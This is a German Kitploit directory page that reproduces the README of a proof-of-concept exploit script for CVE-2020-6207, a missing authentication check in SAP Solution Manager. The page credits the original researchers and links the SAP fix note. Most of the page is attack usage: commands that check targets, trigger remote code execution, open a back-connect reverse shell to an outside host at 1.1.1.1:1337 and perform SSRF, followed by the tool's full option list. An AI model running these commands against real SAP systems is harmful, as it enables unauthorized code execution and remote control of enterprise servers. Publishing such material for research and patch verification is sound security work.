Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
SAP_EEM_CVE-2020-6207 — PoC für CVE-2020-6207 (Fehlende Authentifizierungsprüfung in SAP Solution Manager) | Kitploit
Tools/GitHubGitHub/chipik/sap_eem_cve-2020-6207
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlLernen & BildungRemote-Access-Tool
GitHubchipik/sap_eem_cve-2020-6207

SAP_EEM_CVE-2020-6207

PoC für CVE-2020-6207 (Fehlende Authentifizierungsprüfung in SAP Solution Manager)

Repository anzeigen
8225vor 5 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

PoC für CVE-2020-6207 (Fehlende Authentifizierungsprüfung im SAP Solution Manager)
Dieses Skript ermöglicht es, fehlende Authentifizierungsprüfungen im SAP EEM-Servlet (tc~smd~agent~application~eem) zu überprüfen und auszunutzen, die zu RCE auf SAP SMDAgents führen, die mit SAP Solution Manager verbunden sind.
Ursprüngliche Entdeckung:

  • Pablo Artuso
  • Yvan 'iggy' G

Paper: An Unauthenticated Journey to Root :Pwning Your Company's Enterprise Software Servers
Lösung: SAP-Hinweis 2890213

Folge mir auf Twitter: @chipik

Dieses Projekt dient ausschließlich Bildungszwecken und darf nicht für Gesetzesverstöße oder persönlichen Gewinn genutzt werden.
Der Autor dieses Projekts ist nicht verantwortlich für mögliche Schäden, die durch die Materialien dieses Projekts verursacht werden.

Details

Weitere Details zu den Schwachstellen findest du im Artikel process

Verwendung

Gib einfach Hostname/IP-Adresse des SAP Solution Managers an.

Prüfen

root@kitploit:~
➜ python sol-rce.py -H 172.16.30.43 -P 50000 -c
Vulnerable! [CVE-2020-6207] - http://172.16.30.43:50000

RCE auslösen

root@kitploit:~
➜ python sol-rce.py -H 172.16.30.43 -P 50000 --rce calc.exe

gif

BackConnect erhalten

root@kitploit:~
➜ python sol-rce.py -H 172.16.30.43 -P 50000 --back 1.1.1.1:1337

SSRF

root@kitploit:~
➜ python sol-rce.py -H 172.16.30.43 -P 50000 --ssrf http://1.1.1.1/chpk

Sonstiges

Es gibt weitere Optionen:

root@kitploit:~
➜ python sol-rce.py -h

usage: sol-rce.py [-h] [-H HOST] [-P PORT] [-p PROXY] [-s] [-c] [-d VICTIM]
                  [--ssrf SSRF] [--rce RCE] [--back BACK] [--setup SETUP]
                  [--list] [--clear] [-t TIMEOUT] [-v]

PoC for CVE-2020-6207, (Missing Authentication Check in SAP Solution Manager)
This script allows to check and exploit missing authentication checks in SAP EEM servlet (tc~smd~agent~application~eem) that lead to RCE on SAP SMDAgents connected to SAP Solution Manager
Original finding:
- Pablo Artuso. https://twitter.com/lmkalg
- Yvan 'iggy' G https://twitter.com/_1ggy

Paper: https://i.blackhat.com/USA-20/Wednesday/us-20-Artuso-An-Unauthenticated-Journey-To-Root-Pwning-Your-Companys-Enterprise-Software-Servers-wp.pdf
Solution: https://launchpad.support.sap.com/#/notes/2890213

twitter: https://twitter.com/_chipik

optional arguments:
  -h, --help            show this help message and exit
  -H HOST, --host HOST  SAP Solution Manager host(default: 127.0.0.1)
  -P PORT, --port PORT  SAP Solution Manager web port (default: tcp/50000)
  -p PROXY, --proxy PROXY
                        Use proxy (ex: 127.0.0.1:8080)
  -s, --ssl             enable SSL
  -c, --check           just detect vulnerability
  -d VICTIM, --victim VICTIM
                        DA serverName
  --ssrf SSRF           exploit SSRF. Point http address here. (example:http://1.1.1.1/chpk)
  --rce RCE             exploit RCE
  --back BACK           get backConnect from DA. (ex: 1.1.1.1:1337)
  --setup SETUP         setup a random serverName to the DA with the given hostName and instanceName. (example: javaup.mshome.net,SMDA97)
  --list                Get a list of existing DA servers
  --clear               stop and delete all PoCScript<rnd> scripts from DA servers
  -t TIMEOUT, --timeout TIMEOUT
                        HTTP connection timeout in second (default: 10)
  -v, --verbose         verbose mode
Tool herunterladen